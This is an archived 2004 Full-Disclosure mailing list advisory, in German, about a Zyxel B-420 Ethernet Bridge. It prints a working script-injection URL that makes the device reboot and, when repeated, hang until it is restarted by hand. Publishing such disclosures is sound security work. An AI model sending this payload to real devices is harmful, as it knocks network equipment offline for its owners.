'[Full-Disclosure] Cross Site Scripting DOS (Zyxel B-420 Ethernet'

[prev in list] [next in list] [prev in thread] [next in thread] 

List:       full-disclosure
Subject:    [Full-Disclosure] Cross Site Scripting DOS (Zyxel B-420 Ethernet
From:       beniwiedmer () tiscali ! ch
Date:       2004-12-31 12:35:23
Message-ID: 416FDAC300031A21 () mx2 ! tiscali ! ch
[Download RAW message or body]

Cross Site Scripting DOS (Zyxel B-420 Ethernet Bridge)

Wird einer B-420 Ethernet Bridge folgende URL übergeben startet sie neu.

http://<IP>/Forms/rpAuth_1?ZyXEL%20ZyWALL%20Series<script>top.location.pathname
= ""</script>

Wird das ganze noch einmal wiederholt startet sie nicht mehr neu, sondern
hängt einfach
bzw. nimmt keine Anforderungen mehr entgegen und muss Manuel neu gestartet
werden.

Es können auch andere Scripts übergeben werden, die sie zum Absturz bringen.

Wir vermuten das noch andere Produkte wie z.B Router, Hardware Firewalls
und/oder ähnliches 
betroffen sein könnten.

by C H F

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html
[prev in list] [next in list] [prev in thread] [next in thread]

Configure | About | News | Add a list | Sponsored by KoreLogic